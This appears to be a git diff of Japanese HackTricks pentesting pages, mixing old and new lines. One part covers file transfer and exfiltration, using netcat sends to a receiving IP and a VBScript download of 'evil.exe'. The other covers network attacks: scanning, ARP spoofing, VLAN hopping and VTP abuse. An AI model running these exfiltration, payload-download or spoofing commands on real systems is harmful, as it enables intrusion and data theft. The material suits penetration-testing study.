```bash
nc -lvp <PORT> > received_file
```
On the target machine:
```bash
nc <RECEIVING_IP> <PORT> < file_to_send
```
#### Considerations
- Ensure that the port you choose is open and accessible.
- Encrypt the data if necessary to prevent interception.
- Be cautious when using `nc` as it can be detected by intrusion detection systems.
NCNetcatは、ネットワーク通信を行うための便利なツールです。通常、NCはリバースシェルを作成するために使用され、攻撃者が外部のシステムにアクセスし、データを送信するのに役立ちます。
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
@ -313,7 +282,7 @@ sudo python -m smtpd -n -c DebuggingServer :25
XPおよび2003ではデフォルトで有効他のOSではインストール時に明示的に追加する必要がある
Kaliでは、**TFTPサーバーを起動**します
Kaliでは、**TFTPサーバーを起動**
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
@ -337,7 +306,7 @@ echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', '
```
## VBScript
Visual Basic Script (VBScript) は、Microsoft Windows 環境で広く使用されているスクリプト言語です。VBScript を使用して、ファイルをエクスフィルトレーションする方法の一例を以下に示します。
Visual Basic ScriptVBScriptは、Microsoft Windows環境で広く使用されているスクリプト言語です。VBScriptを使用して、ファイルやデータを外部に送信するためのスクリプトを作成することができます。VBScriptを使用したデータの外部送信は、機密情報の漏洩につながる可能性があるため、慎重に取り扱う必要があります。
```bash
Attacker> python -m SimpleHTTPServer 80
```
@ -375,14 +344,10 @@ cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
これはWindows 32ビットマシンで機能するクレイジーなテクニックです。アイデアは`debug.exe`プログラムを使用することです。これはデバッガのようにバイナリを検査するために使用されます。しかし、16進数から再構築することもできます。したがって、バイナリ`netcat`を16進数に分解し、それを侵害されたマシン上のファイルに貼り付け、`debug.exe`で組み立てるというアイデアです。
`Debug.exe`は64 kbしか組み立てられません。そのため、それよりも小さいファイルを使用する必要があります。さらに圧縮するためにupxを使用できます。それでは、やってみましょう
```
`debug.exe`プログラムは、バイナリの検査だけでなく、**16進数からバイナリを再構築する機能**も持っています。つまり、バイナリの16進数を提供することで、`debug.exe`がバイナリファイルを生成できます。ただし、`debug.exe`には**64 kbまでのファイルをアセンブリするという制限**があることに注意することが重要です。
```bash
# Reduce the size
upx -9 nc.exe
```
今はたった29 kbしかありません。完璧です。では、これを分解してみましょう
```
wine exe2bat.exe nc.exe nc.txt
```
## DNS
@ -391,21 +356,6 @@ wine exe2bat.exe nc.exe nc.txt
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ
次に、テキストをWindowsシェルにコピーして貼り付け、nc.exeというファイルが作成されます
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)

324
generic-methodologies-and-resources/pentesting-network/README.md
View file

@ -6,11 +6,11 @@
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**か**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
- **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
- **ハッキングトリックを共有する**には、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
@ -21,12 +21,12 @@ HackTricksをサポートする他の方法
## 外部からホストを発見する
これは**インターネットから応答するIPを見つける方法**についての**簡単なセクション**になります。\
これは**インターネットからIPが応答しているかを見つける**方法についての**簡単なセクション**になります。\
この状況では、いくつかの**IPのスコープ**(おそらく複数の**範囲**さえも)があり、**どのIPが応答しているか**を見つけるだけです。
### ICMP
これはホストが起動しているかどうかを発見する**最も簡単で速い方法**です。\
これはホストが起動しているかどうかを発見する**最も簡単で速い**方法です。\
いくつかの**ICMP**パケットを送信して**応答を期待**することができます。最も簡単な方法は、**エコーリクエスト**を送信して応答を期待することです。単純な`ping`を使用するか、**範囲**用に`fping`を使用することができます。\
他の種類のICMPパケットを送信するために**nmap**を使用することもできますこれにより、一般的なICMPエコーリクエスト-レスポンスへのフィルタが回避されます)。
```bash
@ -34,10 +34,10 @@ ping -c 1 199.66.11.4 # 1 echo request to a host
fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
```
### TCPポートの発見
### TCP ポートの発見
すべての種類のICMPパケットがフィルタリングされていることが非常に一般的です。そのため、ホストが稼働しているかどうかを確認するためにできることは**オープンポートを見つけること**だけです。各ホストには**65535ポート**がありますので、もし「大規模なスコープを持っている場合、各ホストの**すべてのポート**が開いているかどうかをテストすることはできません。それには時間がかかりすぎます。\
そのため、必要なものは**高速ポートスキャナー**[masscan](https://github.com/robertdavidgraham/masscan))と**よく使用されるポートのリスト**です:
すべての種類の ICMP パケットがフィルタリングされていることが非常に一般的です。そのため、ホストが稼働しているかどうかを確認するためにできることは**オープンポートを見つけようとす**ことです。各ホストには**65535個のポート**がありますので、もし「大規模なスコープを持っている場合、各ホストの**各ポート**がオープンしているかどうかをテストすることはできません。それには時間がかかりすぎます。\
そのため、必要なものは**高速ポートスキャナー**[masscan](https://github.com/robertdavidgraham/masscan))と**よく使用されるポートのリスト**です:
```bash
#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
@ -50,13 +50,13 @@ masscan -p80,443,8000-8100,8443 199.66.11.0/24
```
### UDPポートの発見
また、ホストに**より注意を払うべきかどうか**を判断するために、**UDPポートが開いているかどうか**をチェックすることもできます。通常、UDPサービスは**通常の空のUDPプローブパケットにデータを返さない**ため、ポートがフィルタリングされているか開いているかを判断するのは難しいです。これを判断する最も簡単な方法は、実行中のサービスに関連するパケットを送信することですが、実行中のサービスがわからないため、ポート番号に基づいて最もありそうなものを試す必要があります。
また、ホストに**より注意を払うべきかどうか**を判断するために、**UDPポートが開いているかどうか**をチェックすることもできます。通常、UDPサービスは**通常の空のUDPプローブパケットに対して** **データを返さない**ため、ポートがフィルタリングされているか開いているかを判断するのは難しいです。これを判断する最も簡単な方法は、実行中のサービスに関連するパケットを送信することであり、実行中のサービスがわからないため、ポート番号に基づいて最もありそうなものを試す必要があります。
```bash
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable
```
前に提案されたnmapの行は、/24の範囲内のすべてのホストで**上位1000のUDPポート**をテストしますが、これだけでも**20分以上**かかります。 より**高速な結果**が必要な場合は、[**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner)を使用できます:`./udp-proto-scanner.pl 199.66.11.53/24` これにより、これらの**UDPプローブ**がそれらの**期待されるポート**に送信されます(/24の範囲では1分で完了します_DNSStatusRequest、DNSVersionBindReq、NBTStat、NTPRequest、RPCCheck、SNMPv3GetRequest、chargen、citrix、daytime、db2、echo、gtpv1、ike、ms-sql、ms-sql-slam、netop、ntp、rpc、snmp-public、systat、tftp、time、xdmcp。_
前に提案されたnmapの行は、/24の範囲内のすべてのホストで**上位1000のUDPポート**をテストしますが、これだけでも**20分以上**かかります。**最速の結果**が必要な場合は、[**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner)を使用できます:`./udp-proto-scanner.pl 199.66.11.53/24` これにより、これらの**UDPプローブ**がそれらの**期待されるポート**に送信されます(/24の範囲では1分で完了します_DNSStatusRequest、DNSVersionBindReq、NBTStat、NTPRequest、RPCCheck、SNMPv3GetRequest、chargen、citrix、daytime、db2、echo、gtpv1、ike、ms-sql、ms-sql-slam、netop、ntp、rpc、snmp-public、systat、tftp、time、xdmcp。_
### SCTPポートの発見
```bash
@ -89,7 +89,7 @@ set net.show.meta true #more info
### Active
外部からホストを発見する方法でコメントされているテクニックは、ここでも**適用できます**。\
ただし、他のホストと**同じネットワーク**にいるため、**さらに多くのこと**ができます
ただし、他のホストと**同じネットワーク**にいるため、**さらに多くのこと**ができます:
```bash
#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
@ -116,13 +116,13 @@ _外部からホストを発見する_ でコメントされている技術([_
- **サブネットブロードキャストアドレス**に**ping**を送信すると、**各ホスト**にpingが到達し、彼らが**応答**する可能性があります: `ping -b 10.10.5.255`
- **ネットワークブロードキャストアドレス**にpingを送信すると、**他のサブネット内のホスト**を見つけることさえできます: `ping -b 255.255.255.255`
- `nmap`の`-PE`、`-PP`、`-PM`フラグを使用して、それぞれ**ICMPv4 echo**、**timestamp**、**subnet mask requests**を送信してホストの検出を実行します: `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
- `nmap`の`-PE`、`-PP`、`-PM`フラグを使用して、それぞれ**ICMPv4 echo**、**タイムスタンプ**、**サブネットマスクリクエスト**を送信してホストの検出を実行します: `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
### **Wake On Lan**
Wake On Lanは、**ネットワークメッセージ**を介してコンピューターを**起動**するために使用されます。コンピューターを起動するために使用されるマジックパケットは、**MAC Dst**が提供され、その後、同じパケット内で**16回繰り返される**パケットです。\
その後、この種のパケットは通常、**イーサネット0x0842**または**ポート9へのUDPパケット**送信されます。\
**\[MAC]**が提供されない場合、パケットは**ブロードキャストイーサネット**に送信されますブロードキャストMACが繰り返されるものになります)。
Wake On Lanは、**ネットワークメッセージ**を介してコンピューターを**起動**するために使用されます。コンピューターを起動するために使用されるマジックパケットは、**MAC Dst**が提供され、その後、同じパケット内で**16回繰り返される**パケットだけです。\
その後、この種のパケットは通常、**イーサネット0x0842**または**ポート9へのUDPパケット**送信されます。\
**\[MAC]**が提供されない場合、パケットは**ブロードキャストイーサネット**に送信されますブロードキャストMACが繰り返されるMACになります)。
```bash
# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
@ -130,14 +130,14 @@ wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
```
## ホストのスキャン
IPアドレス外部または内部をすべて発見したら、深くスキャンしたい場合、さまざまなアクションを実行できます。
IPアドレス外部または内部をすべて発見したら、詳細にスキャンしたい場合、さまざまなアクションを実行できます。
### TCP
* **オープン**ポート: _SYN --> SYN/ACK --> RST_
* **クローズド**ポート: _SYN --> RST/ACK_
* **フィルタリングされた**ポート: _SYN --> \[NO RESPONSE]_
* **フィルタリングされた**ポート: _SYN --> ICMPメッセージ_
- **オープン**ポート: _SYN --> SYN/ACK --> RST_
- **クローズド**ポート: _SYN --> RST/ACK_
- **フィルターされた**ポート: _SYN --> \[NO RESPONSE]_
- **フィルターされた**ポート: _SYN --> ICMPメッセージ_
```bash
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
@ -153,10 +153,10 @@ syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
UDPポートをスキャンするための2つのオプションがあります
- ポートが**閉じている**場合は、**UDPパケット**を送信して応答が **ICMP unreachable** かどうかを確認します(いくつかのケースでは、ICMPが**フィルタリング**されているため、ポートが閉じているか開いているかの情報を受信できないことがあります)。
- **フォーマットされたデータグラム**を送信して、**サービス**DNS、DHCP、TFTPなど、_nmap-payloads_にリストされている他のサービス)から応答を引き出します。応答を受信した場合、ポートは**開いています**。
- ポートが**閉じている**場合は、**UDPパケット**を送信し、応答として**ICMP unreachable**をチェックします(いくつかのケースではICMPが**フィルタリング**されているため、ポートが閉じているか開いているかの情報を受信できないことがあります)。
- **フォーマットされたデータグラム**を送信して、**サービス**DNS、DHCP、TFTPなど、_nmap-payloads_にリストされているから応答を引き出します。応答を受信した場合、ポートは**開いています**。
**Nmap**は"-sV"を使用して**両方の**オプションを組み合わせますUDPスキャンは非常に遅いです、ただしUDPスキャンはTCPスキャンよりも遅いことに注意してください
**Nmap**は"-sV"を使用して**両方の**オプションを組み合わせますUDPスキャンは非常に遅いです、ただしUDPスキャンはTCPスキャンよりも遅いことに注意してください
```bash
# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
@ -170,9 +170,11 @@ nmap -sU -sV --version-intensity 0 -n -T4 <IP>
```
### SCTPスキャン
SCTPはTCPとUDPと並んでいます。IP上での**電話**データの**輸送**を提供することを意図しており、このプロトコルはSignaling System 7 (SS7)の信頼性機能の多くを複製し、SIGTRANとして知られるより大きなプロトコルファミリーの基盤となっています。SCTPは、IBM AIX、Oracle Solaris、HP-UX、Linux、Cisco IOS、VxWorksなどのオペレーティングシステムでサポートされています。
**SCTPStream Control Transmission Protocol**は、**TCPTransmission Control Protocol**および**UDPUser Datagram Protocol**と併用するように設計されています。その主な目的は、**Signaling System 7SS7**で見られる信頼性の機能の多くを反映しながら、IPネットワーク上での電話データの輸送を容易にすることです。**SCTP**は、**SIGTRAN**プロトコルファミリーの中核コンポーネントであり、SS7信号をIPネットワーク上で輸送することを目的としています。
nmapによってSCTP用に提供されている2つの異なるスキャンは、_-sY_と_-sZ_です。
**SCTP**のサポートは、**IBM AIX**、**Oracle Solaris**、**HP-UX**、**Linux**、**Cisco IOS**、**VxWorks**など、さまざまなオペレーティングシステムによって提供されており、その広範な受容と通信およびネットワーキング分野での有用性が示されています。
nmapによって提供されるSCTPの2つの異なるスキャンオプションは、_-sY_と_-sZ_です。
```bash
# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
@ -191,9 +193,9 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
[nmap-summary-esp.md](nmap-summary-esp.md)
{% endcontent-ref %}
### 内部IPアドレスの公開
### 内部IPアドレスの特定
設定ミスのルーター、ファイアウォール、およびネットワークデバイスは、時々**非公開ソースアドレスを使用して**ネットワークプローブに**応答**します。テスト中に**tcpdump**を使用して、**プライベートアドレス**から受信したパケットを**特定**できます。この場合、Kali Linuxの_eth2_インターフェースは**公共インターネット**から**アクセス可能**です(**NAT**または**ファイアウォール**の**背後**にいる場合、この種のパケットはおそらく**フィルタリング**されます)
**設定ミスのルーター、ファイアウォール、およびネットワークデバイス** は、時々 **非公開ソースアドレス** を使用してネットワークプローブに応答します。**tcpdump** を使用して、テスト中にプライベートアドレスから受信したパケットを特定できます。具体的には、Kali Linuxでは、**eth2インターフェース** でパケットをキャプチャできます。このインターフェースは、インターネットからアクセスできます。設定がNATまたはファイアウォールの背後にある場合、このようなパケットはおそらくフィルタリングされますので、注意が必要です
```bash
tcpdump nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
@ -220,7 +222,7 @@ ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | su
```
### Bettercap
Bettercapは、ネットワーク内の様々な攻撃を実行するための強力なツールです。ARPスプーフィング、SSLストリップ、DNSスプーフィングなどの攻撃を実行するために使用されます。Bettercapは、中間者攻撃や情報収集などのペネトレーションテスト活動で広く使用されています。
Bettercapは、ネットワーク内の様々な攻撃を実行するための強力なツールです。ARPスプーフィング、SSLストリップ、DNS偽装などの攻撃を実行するために使用されます。Bettercapは、中間者攻撃やネットワークスニッフィングなどのテスト中に広く使用されています。
```bash
net.sniff on
net.sniff stats
@ -241,7 +243,7 @@ set net.sniff.regexp #If set only packets matching this regex will be considered
### ARP スプーフィング
ARP スプーフィングは、機器のIPが当該デバイスのMACアドレスであることを示す gratuitous ARPResponses を送信することで構成されます。その後、被害者はARPテーブルを変更し、IPスプーフィングを行う際には常に当該IPに接触するために当機器に連絡します。
ARP スプーフィングは、機器のIPが自分のデバイスのMACアドレスであることを示すために不正なARP応答を送信することです。その後、被害者はARPテーブルを変更し、スプーフィングされたIPに接触したいときには常に当機器に接触します。
#### **Bettercap**
```bash
@ -252,6 +254,8 @@ set arp.spoof.fullduplex true #If true, both the targets and the gateway will be
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
```
#### **Arpspoof**
Arpspoofは、ARPプロトコルを悪用して、ターゲットデバイスとゲートウェイの間の通信を傍受するために使用されます。
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
@ -263,17 +267,19 @@ arpspoof -t 192.168.1.2 192.168.1.1
```bash
macof -i <interface>
```
### 802.1Q VLAN / DTP Attacks
現代のスイッチでは、この脆弱性は修正されています。
#### Dynamic Trunking
### 802.1Q VLAN / DTP 攻撃
**DTP (Dynamic Trunking Protocol)**は、自動トランクシステムを提供するために設計されたリンク層プロトコルです。DTPを使用すると、スイッチはどのポートがトランクモードトランクで動作し、どのポートがそうでないかを決定します。**DTPの使用はネットワーク設計が不十分であることを示しています。** **トランクは必要な場所に厳密に配置され、文書化されるべきです。**
#### 動的トランク
**デフォルトでは、すべてのスイッチポートはDynamic Autoモードで動作します。** これは、スイッチポートが隣接するスイッチからのトランク初期化モードにあることを示します。**ペンテスターはスイッチに物理的に接続し、DTPデザイアブルフレームを送信する必要があります**。これにより、ポートがトランクモードに切り替わります。攻撃者はその後、STPフレームの解析を使用してVLANを列挙し、仮想インターフェイスを作成することでVLANセグメンテーションをバイパスできます。
**動的トランクプロトコルDTP**は、トランクモード(トランク)または非トランクモードのポートを自動的に選択するための自動システムを容易にするために設計されたリンク層プロトコルです。 **DTP**の展開は、しばしばサブオプティマルなネットワーク設計の兆候と見なされ、必要な場所だけでトランクを手動で構成し、適切なドキュメントを確認することの重要性を強調しています。
多くのスイッチはデフォルトでDynamic Trunking ProtocolDTPをサポートしていますが、これを悪用して**スイッチをエミュレートし、すべてのVLANを介してトラフィックを受信**することができます。ツール[_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan)はインターフェースをスニッフィングし、**スイッチがデフォルトモード、トランク、ダイナミック、自動、またはアクセスモードであるかを報告**しますこれはVLANホッピングを回避する唯一の方法です。ツールはスイッチが脆弱かどうかを示します。
デフォルトでは、スイッチポートは動的オートモードで動作するように設定されており、隣接するスイッチに促されるとトランクを開始できる状態です。 ペンテスターまたは攻撃者がスイッチに接続し、DTPデザイアブルフレームを送信すると、ポートがトランクモードに入るため、セキュリティ上の懸念が生じます。 このアクションにより、攻撃者はSTPフレームの解析を通じてVLANを列挙し、仮想インターフェースを設定することでVLANセグメンテーションを回避できます。
ネットワークが脆弱であることが判明した場合、_**Yersinia**_を使用してプロトコル**「DTP」**を使用して**「トランキングを有効にする」**を実行し、すべてのVLANからのネットワークパケットを表示できます。
多くのスイッチにデフォルトでDTPが存在することを悪用することで、敵対者はスイッチの振る舞いを模倣し、すべてのVLANを通過するトラフィックにアクセスできます。 スクリプト[_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan)は、インターフェースを監視し、スイッチがデフォルト、トランク、ダイナミック、オート、またはアクセスモードのいずれであるかを示し、VLANホッピング攻撃に対して免疫のある唯一の構成である後者を評価するために使用されます。 このツールは、スイッチの脆弱性ステータスを評価します。
ネットワークの脆弱性が特定された場合、_**Yersinia**_ツールを使用してDTPプロトコルを介して「トランクを有効に」し、すべてのVLANからのパケットを観察できます。
```bash
apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
@ -286,19 +292,19 @@ yersinia -G #For graphic mode
```
![](<../../.gitbook/assets/image (646) (1).png>)
VLANを列挙するためには、[**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**というスクリプトを使用してDTPデザイアブルフレームを生成することも可能です。**スクリプトを絶対に中断しないでください。** 3秒ごとにDTPデザイアブルをインジェクトします。**スイッチ上で動的に作成されたトランクチャネルは、5分間だけ有効です。5分後にトランクが切断されます。**
VLANを列挙するためには、スクリプト[DTPHijacking.py](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)を使用してDTPデザイアブルフレームを生成することも可能です。スクリプトを絶対に中断しないでください。それは3秒ごとにDTPデザイアブルをインジェクトします。スイッチ上で動的に作成されたトランクチャネルは、5分間だけ有効です。5分後にトランクは切断されます。
```
sudo python3 DTPHijacking.py --interface eth0
```
私たちは、**Access/Desirable (0x03)** がDTPフレームがDesirableタイプであることを示し、ポートにTrunkモードへの切り替えを指示することを示していることを指摘したいと思います。そして、**802.1Q/802.1Q (0xa5)** は **802.1Q** カプセル化タイプを示しています。
STPフレームを分析することで、**VLAN 30とVLAN 60の存在について知ることができます。**
STPフレームを分析することで、**VLAN 30とVLAN 60の存在知ることができます。**
<figure><img src="../../.gitbook/assets/image (18) (1).png" alt=""><figcaption></figcaption></figure>
#### 特定のVLANへの攻撃
VLANのIDとIP値を知っている場合、**特定のVLANに攻撃するために仮想インターフェースを設定**することができます。\
VLANのIDとIP値を知ったら、**特定のVLANを攻撃するために仮想インターフェースを設定**することができます。\
DHCPが利用できない場合は、静的IPアドレスを設定するために _ifconfig_ を使用してください。
```
root@kali:~# modprobe 8021q
@ -334,11 +340,11 @@ sudo dhclient -v eth0.30
```
#### 自動VLANホッパー
**Dynamic Trunking**の攻撃と他のVLAN内のホストを発見するための**仮想インターフェースの作成**は、[**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)というツールによって**自動的に実行**されます。
**ダイナミックトランキングと仮想インターフェースの作成、他のVLAN内のホストの発見**という攻撃は、[**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)というツールによって**自動的に実行**されます。
#### ダブルタギング
攻撃者が**被害者ホストのMAC、IP、VLAN IDの値を知っている**場合、指定されたVLANと被害者のVLANで**フレームにダブルタグを付け**、パケットを送信することができます。**被害者は攻撃者に接続できなくなる**ため、**攻撃者の最良の選択肢はUDPを介して通信する**ことです。これにより、SNMPのような興味深いアクションを実行できるプロトコルにアクセスできます。
攻撃者が**被害者ホストのMAC、IP、VLAN IDの値を知っている**場合、指定されたVLANと被害者のVLANで**フレームにダブルタグを付け**、パケットを送信することができます。**被害者は攻撃者に接続できな**ため、**攻撃者の最良の選択肢はUDPを介して通信する**ことです。これにより、SNMPのような興味深いアクションを実行できるプロトコルにアクセスできます。
攻撃者の別の選択肢は、**攻撃者が制御するIPをスプーフィングし、被害者がアクセスできるおそらくインターネット経由でIPを使用してTCPポートスキャンを実行**することです。その後、攻撃者は、被害者からパケットを受信するかどうかを自分が所有する2番目のホストでスニッフィングできます。
@ -351,49 +357,47 @@ sendp(packet)
```
#### レイテラルVLANセグメンテーションバイパス <a href="#d679" id="d679"></a>
**直接接続されたスイッチにアクセス権がある場合**、ネットワーク内での**VLANセグメンテーションをバイパス**する能力があります。単純にポートをトランクモードトランクとも呼ばれるに切り替え、ターゲットVLANのIDを持つ仮想インターフェースを作成し、IPアドレスを構成します。アドレスを動的にリクエストDHCPするか、静的に構成するかはケースによります。
**直接接続されたスイッチにアクセス権がある場合**、ネットワーク内での**VLANセグメンテーションをバイパス**する能力があります。単純にポートをトランクモードトランクとも呼ばれるに切り替え、ターゲットVLANのIDを持つ仮想インターフェースを作成し、IPアドレスを構成します。アドレスを動的にDHCP要求するか、静的に構成するかはケースによります。
{% content-ref url="lateral-vlan-segmentation-bypass.md" %}
[lateral-vlan-segmentation-bypass.md](lateral-vlan-segmentation-bypass.md)
{% endcontent-ref %}
#### レイヤー3プライベートVLANバイパス
#### レイヤー3 プライベートVLAN バイパス
ゲストワイヤレスネットワークやその他の環境では、プライベートVLANポートアイソレーションとも呼ばれる設定が使用されています。これは、ピア同士の相互作用を防ぐために使用されますつまり、クライアントがワイヤレスアクセスポイントに接続しても互いにアドレスを指定できない。ネットワークACLまたはそれがない場合に応じて、IPパケットをルーターに送信し、その後隣接するピアに転送することが可能かもしれません
特定の環境、例えばゲストワイヤレスネットワークでは、**ポートアイソレーションプライベートVLANとも呼ばれる** 設定が実装され、ワイヤレスアクセスポイントに接続されたクライアント同士の直接通信を防止しています。しかし、これらの分離対策を回避する技術が特定されています。この技術は、ネットワークACLの欠如または不適切な構成を悪用し、IPパケットをルーターを介して他のクライアントに到達させることが可能です
この攻撃では、**クライアントのIPに対してルーターのMACを持つ特別に作成されたパケットを送信**します。その後、**ルーターはパケットをクライアントにリダイレクト**します。_ダブルタギング攻撃_と同様に、被害者がアクセス可能なホストを制御することでこの脆弱性を悪用できます。
攻撃は、**宛先クライアントのIPアドレスを持つパケットをルーターのMACアドレスで送信する**ことによって実行されます。これにより、ルーターは誤ってパケットをターゲットクライアントに転送します。このアプローチは、被害者にアクセス可能なホストを制御することでセキュリティ上の欠陥を悪用するダブルタギング攻撃で使用されるものと似ています。
**攻撃の主なステップ:**
1. **パケットの作成:** ターゲットクライアントのIPアドレスを含む特別に作成されたパケットを作成しますが、ルーターのMACアドレスを使用します。
2. **ルーターの動作の悪用:** 作成されたパケットはルーターに送信され、構成により、プライベートVLAN設定によって提供される分離をバイパスして、パケットがターゲットクライアントに転送されます。
### VTP攻撃
**VTPVLANトランキングプロトコル**はVLANを中央で管理するためのプロトコルです。スイッチは現在のVLANデータベースを追跡するために特別なリビジョン番号を確認します。テーブルの更新が発生すると、リビジョン番号は1つ増加します。スイッチがより高いリビジョン番号の構成を検出すると、自動的にVLANデータベースを更新します。
VTPVLANトランキングプロトコルはVLAN管理を集約化します。リビジョン番号を使用してVLANデータベースの整合性を維持し、変更があるとこの番号が増加します。スイッチは、より高いリビジョン番号の構成を採用し、独自のVLANデータベースを更新します。
#### VTPドメインの役割 <a href="#ebfc" id="ebfc"></a>
#### VTPドメインの役割
* **VTPサーバー.** VTPサーバーの役割を持つスイッチは新しいVLANを作成したり、古いVLANを削除したり、VLAN自体の情報を変更したりできます。**ドメインの他のメンバーに対してVTPアナウンスを生成**します。
* **VTPクライアント.** この役割のスイッチは、ドメイン内の他のスイッチから特定のVTPアナウンスを受信して、自分自身のVLANデータベースを更新します。クライアントはVLANを作成する能力に制限があり、VLAN構成をローカルで変更することさえ許可されません。言い換えれば、**読み取り専用アクセス**です。
* **VTPトランスペアレント.** このモードでは、スイッチはVTPプロセスに参加せず、全体のVLAN構成の完全かつローカルな管理を行うことができます。トランスペアレントモードで動作するとき、スイッチは他のスイッチからのVTPアナウンスのみを送信し、そのVLAN構成に影響を与えません。**このようなスイッチは常にリビジョン番号がゼロであり、攻撃されることはありません。**
- **VTPサーバー:** VLANを管理し、作成、削除、変更を行います。ドメインメンバーにVTPアナウンスをブロードキャストします。
- **VTPクライアント:** VTPアナウンスを受信してVLANデータベースを同期します。この役割は、ローカルVLAN構成の変更を制限されています。
- **VTPトランスペアレント:** VTPの更新には参加せず、VTPアナウンスを転送します。VTP攻撃の影響を受けず、リビジョン番号は常にゼロのままです。
#### 広告タイプ <a href="#b384" id="b384"></a>
#### VTP広告タイプ
* **サマリー広告 —** VTPサーバーが**300秒5分ごとに**送信するVTPアナウンスです。このアナウンスにはVTPドメイン名、プロトコルバージョン、タイムスタンプ、およびMD5構成ハッシュ値が格納されています。
* **サブセット広告 —** これはVLAN構成の変更が発生するたびに送信されるVTP広告です。
* **広告リクエスト —** これはVTPクライアントからVTPサーバーに対するサマリー広告メッセージのリクエストです。通常、スイッチがより高い構成リビジョン番号を持つサマリー広告を検出したメッセージに対する応答として送信されます。
